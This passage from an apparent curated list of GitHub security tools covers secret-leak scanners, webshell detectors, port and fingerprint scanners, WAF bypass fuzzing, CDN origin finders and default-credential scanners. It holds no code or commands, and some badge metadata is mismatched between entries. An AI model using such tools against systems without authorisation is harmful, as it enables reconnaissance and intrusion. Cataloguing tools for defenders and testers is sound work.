> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/0xbug/Hawkeye?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/0xbug/Hawkeye?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/0xbug/Hawkeye?style=flat-square) ![GitHub](https://img.shields.io/github/license/0xbug/Hawkeye?style=flat-square)
- https://github.com/UnkL4b/GitMiner - **Advanced search tool and automation in Github**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/UnkL4b/GitMiner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/UnkL4b/GitMiner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/UnkL4b/GitMiner?style=flat-square) ![GitHub](https://img.shields.io/github/license/UnkL4b/GitMiner?style=flat-square)
- https://github.com/dxa4481/truffleHog - **Searches high entropy strings through git repositories**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/dxa4481/truffleHog?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/dxa4481/truffleHog?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/dxa4481/truffleHog?style=flat-square) ![GitHub](https://img.shields.io/github/license/dxa4481/truffleHog?style=flat-square)
- https://github.com/1N3/Goohak - **Automatically launch Google hacking queries against a target domain**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/1N3/Goohak?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/1N3/Goohak?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/1N3/Goohak?style=flat-square) ![GitHub](https://img.shields.io/github/license/1N3/Goohak?style=flat-square)
- https://github.com/UKHomeOffice/repo-security-scanner - **CLI tool that finds secrets accidentally committed to a git repo, eg passwords, private keys**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/UKHomeOffice/repo-security-scanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/UKHomeOffice/repo-security-scanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/UKHomeOffice/repo-security-scanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/UKHomeOffice/repo-security-scanner?style=flat-square)
- https://github.com/FeeiCN/GSIL - **Github sensitive information leakage scan**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/FeeiCN/GSIL?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/FeeiCN/GSIL?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/FeeiCN/GSIL?style=flat-square) ![GitHub](https://img.shields.io/github/license/FeeiCN/GSIL?style=flat-square)
- https://github.com/MiSecurity/x-patrol - **Github leaked patrol**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/MiSecurity/x-patrol?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/MiSecurity/x-patrol?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/MiSecurity/x-patrol?style=flat-square) ![GitHub](https://img.shields.io/github/license/MiSecurity/x-patrol?style=flat-square)
- https://github.com/anshumanbh/git-all-secrets - **A tool to capture all the git secrets by leveraging multiple open source git searching tools**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/anshumanbh/git-all-secrets?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/anshumanbh/git-all-secrets?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/anshumanbh/git-all-secrets?style=flat-square) ![GitHub](https://img.shields.io/github/license/anshumanbh/git-all-secrets?style=flat-square)
- https://github.com/VKSRC/Github-Monitor - **Github sensitive information leakage monitor by vipkid SRC**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/FeeiCN/GSIL?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/FeeiCN/GSIL?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/FeeiCN/GSIL?style=flat-square) ![GitHub](https://img.shields.io/github/license/FeeiCN/GSIL?style=flat-square)
- https://github.com/eth0izzle/shhgit - **A docker and web based monitor for finding secrets and sensitive files across GitHub**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Go-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/eth0izzle/shhgit?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/eth0izzle/shhgit?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/eth0izzle/shhgit?style=flat-square) ![GitHub](https://img.shields.io/github/license/eth0izzle/shhgit?style=flat-square)
- https://github.com/SAP/credential-digger - **A GitHub scanning tool that identifies hardcoded credentials, filtering the false positive data through machine learning models**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/SAP/credential-digger?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/SAP/credential-digger?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/SAP/credential-digger?style=flat-square) ![GitHub](https://img.shields.io/github/license/SAP/credential-digger?style=flat-square)
- https://github.com/sdushantha/dora - **Find exposed API keys based on RegEx and get exploitation methods for some of keys that are found**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/sdushantha/dora?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/sdushantha/dora?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/sdushantha/dora?style=flat-square) ![GitHub](https://img.shields.io/github/license/sdushantha/dora?style=flat-square)
### Malicious Scripts Detection
- https://github.com/he1m4n6a/findWebshell - **Simple webshell detector**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/he1m4n6a/findWebshell?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/he1m4n6a/findWebshell?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/he1m4n6a/findWebshell?style=flat-square) ![GitHub](https://img.shields.io/github/license/he1m4n6a/findWebshell?style=flat-square)
- https://github.com/nbs-system/php-malware-finder - **An awesome tool to detect potentially malicious PHP files**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/nbs-system/php-malware-finder?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/nbs-system/php-malware-finder?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/nbs-system/php-malware-finder?style=flat-square) ![GitHub](https://img.shields.io/github/license/nbs-system/php-malware-finder?style=flat-square)
- https://github.com/emposha/PHP-Shell-Detector - **Helps you find and identify PHP/Perl/Asp/Aspx shells**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-PHP-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/emposha/PHP-Shell-Detector?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/emposha/PHP-Shell-Detector?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/emposha/PHP-Shell-Detector?style=flat-square) ![GitHub](https://img.shields.io/github/license/emposha/PHP-Shell-Detector?style=flat-square)
- https://github.com/erevus-cn/scan_webshell - **Simple webshell detector**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/erevus-cn/scan_webshell?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/erevus-cn/scan_webshell?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/erevus-cn/scan_webshell?style=flat-square) ![GitHub](https://img.shields.io/github/license/erevus-cn/scan_webshell?style=flat-square)
- https://github.com/emposha/Shell-Detector - **A application that helps you find and identify PHP/Perl/Asp/Aspx shells**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/emposha/Shell-Detector?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/emposha/Shell-Detector?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/emposha/Shell-Detector?style=flat-square) ![GitHub](https://img.shields.io/github/license/emposha/Shell-Detector?style=flat-square)
### Vulnerability Assessment for Middleware
- https://github.com/ring04h/wyportmap - **Target port scanning + system service fingerprint recognition**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ring04h/wyportmap?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ring04h/wyportmap?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ring04h/wyportmap?style=flat-square) ![GitHub](https://img.shields.io/github/license/ring04h/wyportmap?style=flat-square)
- https://github.com/ring04h/weakfilescan - **Dynamic multi - thread sensitive information leak detection tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ring04h/wyportmap?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ring04h/wyportmap?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ring04h/wyportmap?style=flat-square) ![GitHub](https://img.shields.io/github/license/ring04h/wyportmap?style=flat-square)
- https://github.com/EnableSecurity/wafw00f - **Identify and fingerprint Web Application Firewall**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ring04h/weakfilescan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ring04h/weakfilescan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ring04h/weakfilescan?style=flat-square) ![GitHub](https://img.shields.io/github/license/ring04h/weakfilescan?style=flat-square)
- https://github.com/rbsec/sslscan - **Tests SSL/TLS enabled services to discover supported cipher suites**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-C-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/rbsec/sslscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/rbsec/sslscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/rbsec/sslscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/rbsec/sslscan?style=flat-square)
- https://github.com/TideSec/TideFinger - **Web fingerprint identification tool, more fingerprint database, more detection methods**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TideSec/TideFinger?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TideSec/TideFinger?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TideSec/TideFinger?style=flat-square) ![GitHub](https://img.shields.io/github/license/TideSec/TideFinger?style=flat-square)
- https://github.com/TideSec/FuzzScanner - **Comprehensive web information collection platform, easy to deploy, versatile and practical**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/TideSec/FuzzScanner?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/TideSec/FuzzScanner?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/TideSec/FuzzScanner?style=flat-square) ![GitHub](https://img.shields.io/github/license/TideSec/FuzzScanner?style=flat-square)
- https://github.com/urbanadventurer/whatweb - **Website fingerprinter**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/urbanadventurer/whatweb?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/urbanadventurer/whatweb?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/urbanadventurer/whatweb?style=flat-square) ![GitHub](https://img.shields.io/github/license/urbanadventurer/whatweb?style=flat-square)
- https://github.com/tanjiti/FingerPrint - **Another website fingerprinter**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Perl-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/tanjiti/FingerPrint?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/tanjiti/FingerPrint?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/tanjiti/FingerPrint?style=flat-square) ![GitHub](https://img.shields.io/github/license/tanjiti/FingerPrint?style=flat-square)
- https://github.com/nanshihui/Scan-T - **A new spider based on Python with more function including Network fingerprint search**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/nanshihui/Scan-T?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/nanshihui/Scan-T?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/nanshihui/Scan-T?style=flat-square) ![GitHub](https://img.shields.io/github/license/nanshihui/Scan-T?style=flat-square)
- https://github.com/OffensivePython/Nscan - **Fast internet-wide scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/OffensivePython/Nscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/OffensivePython/Nscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/OffensivePython/Nscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/OffensivePython/Nscan?style=flat-square)
- https://github.com/ywolf/F-NAScan - **Scanning a network asset information script**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ywolf/F-NAScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ywolf/F-NAScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ywolf/F-NAScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/ywolf/F-NAScan?style=flat-square)
- https://github.com/maurosoria/dirsearch - **Web path scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/maurosoria/dirsearch?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/maurosoria/dirsearch?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/maurosoria/dirsearch?style=flat-square) ![GitHub](https://img.shields.io/github/license/maurosoria/dirsearch?style=flat-square)
- https://github.com/x0day/bannerscan - **C-segment Banner with path scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/x0day/bannerscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/x0day/bannerscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/x0day/bannerscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/x0day/bannerscan?style=flat-square)
- https://github.com/RASSec/RASscan - **Internal network port service scanners**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/RASSec/RASscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/RASSec/RASscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/RASSec/RASscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/RASSec/RASscan?style=flat-square)
- https://github.com/3xp10it/bypass_waf - **Automatic WAF Bypass Fuzzing Tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/3xp10it/bypass_waf?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/3xp10it/bypass_waf?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/3xp10it/bypass_waf?style=flat-square) ![GitHub](https://img.shields.io/github/license/3xp10it/bypass_waf?style=flat-square)
- https://github.com/3xp10it/xcdn - **Try to find out the actual ip behind cdn**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/3xp10it/xcdn?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/3xp10it/xcdn?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/3xp10it/xcdn?style=flat-square) ![GitHub](https://img.shields.io/github/license/3xp10it/xcdn?style=flat-square)
- https://github.com/Xyntax/BingC - **Based on the Bing search engine C / side-stop query, multi-threaded, supported API**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Xyntax/BingC?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Xyntax/BingC?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Xyntax/BingC?style=flat-square) ![GitHub](https://img.shields.io/github/license/Xyntax/BingC?style=flat-square)
- https://github.com/Xyntax/DirBrute - **Multi-thread web directory enumerating tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Xyntax/DirBrute?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Xyntax/DirBrute?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Xyntax/DirBrute?style=flat-square) ![GitHub](https://img.shields.io/github/license/Xyntax/DirBrute?style=flat-square)
- https://github.com/zer0h/httpscan - **A HTTP service detector with a crawler from IP/CIDR**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/zer0h/httpscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/zer0h/httpscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/zer0h/httpscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/zer0h/httpscan?style=flat-square)
- https://github.com/lietdai/doom - **Distributed task distribution of the IP port vulnerability scanner based on thorn**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/lietdai/doom?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/lietdai/doom?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/lietdai/doom?style=flat-square) ![GitHub](https://img.shields.io/github/license/lietdai/doom?style=flat-square)
- https://github.com/chichou/grab.js - **Fast TCP banner grabbing like zgrab, but supports much more protocol**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Node.js-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/chichou/grab.js?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/chichou/grab.js?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/chichou/grab.js?style=flat-square) ![GitHub](https://img.shields.io/github/license/chichou/grab.js?style=flat-square)
- https://github.com/Nitr4x/whichCDN - **Detect if a given website is protected by a CDN**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Nitr4x/whichCDN?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Nitr4x/whichCDN?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Nitr4x/whichCDN?style=flat-square) ![GitHub](https://img.shields.io/github/license/Nitr4x/whichCDN?style=flat-square)
- https://github.com/secfree/bcrpscan - **Base on crawler result web path scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/secfree/bcrpscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/secfree/bcrpscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/secfree/bcrpscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/secfree/bcrpscan?style=flat-square)
- https://github.com/mozilla/ssh_scan - **A prototype SSH configuration and policy scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Ruby-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/mozilla/ssh_scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/mozilla/ssh_scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/mozilla/ssh_scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/mozilla/ssh_scan?style=flat-square)
- https://github.com/18F/domain-scan - **Scans domains for data on their HTTPS configuration and assorted other things**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/18F/domain-scan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/18F/domain-scan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/18F/domain-scan?style=flat-square) ![GitHub](https://img.shields.io/github/license/18F/domain-scan?style=flat-square)
- https://github.com/ggusoft/inforfinder - **A tool made to collect information of any domain pointing at a server and fingerprinter**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/ggusoft/inforfinder?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/ggusoft/inforfinder?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/ggusoft/inforfinder?style=flat-square) ![GitHub](https://img.shields.io/github/license/ggusoft/inforfinder?style=flat-square)
- https://github.com/boy-hack/gwhatweb - **Fingerprinter for CMS**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/boy-hack/gwhatweb?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/boy-hack/gwhatweb?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/boy-hack/gwhatweb?style=flat-square) ![GitHub](https://img.shields.io/github/license/boy-hack/gwhatweb?style=flat-square)
- https://github.com/Mosuan/FileScan - **Sensitive files scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Mosuan/FileScan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Mosuan/FileScan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Mosuan/FileScan?style=flat-square) ![GitHub](https://img.shields.io/github/license/Mosuan/FileScan?style=flat-square)
- https://github.com/Xyntax/FileSensor - **Dynamic file detection tool based on crawler**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/Xyntax/FileSensor?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/Xyntax/FileSensor?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/Xyntax/FileSensor?style=flat-square) ![GitHub](https://img.shields.io/github/license/Xyntax/FileSensor?style=flat-square)
- https://github.com/deibit/cansina - **Web content discovery tool**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/deibit/cansina?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/deibit/cansina?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/deibit/cansina?style=flat-square) ![GitHub](https://img.shields.io/github/license/deibit/cansina?style=flat-square)
- https://github.com/mozilla/cipherscan - **A very simple way to find out which SSL ciphersuites are supported by a target**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/mozilla/cipherscan?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/mozilla/cipherscan?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/mozilla/cipherscan?style=flat-square) ![GitHub](https://img.shields.io/github/license/mozilla/cipherscan?style=flat-square)
- https://github.com/xmendez/wfuzz - **Web application framework and web content scanner**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/xmendez/wfuzz?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/xmendez/wfuzz?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/xmendez/wfuzz?style=flat-square) ![GitHub](https://img.shields.io/github/license/xmendez/wfuzz?style=flat-square)
- https://github.com/s0md3v/Breacher - **An advanced multithreaded admin panel finder written in Python**
> ![](https://img.shields.io/badge/Score-%E2%98%85%E2%98%85%E2%98%85%E2%98%85%E2%98%85-yellow?style=flat-square) ![](https://img.shields.io/badge/MainLanguage-Python-blue?style=flat-square) ![GitHub language count](https://img.shields.io/github/languages/count/s0md3v/Breacher?style=flat-square) ![GitHub last commit](https://img.shields.io/github/last-commit/s0md3v/Breacher?style=flat-square) ![GitHub stars](https://img.shields.io/github/stars/s0md3v/Breacher?style=flat-square) ![GitHub](https://img.shields.io/github/license/s0md3v/Breacher?style=flat-square)
- https://github.com/ztgrace/changeme - **A default credential scanner**
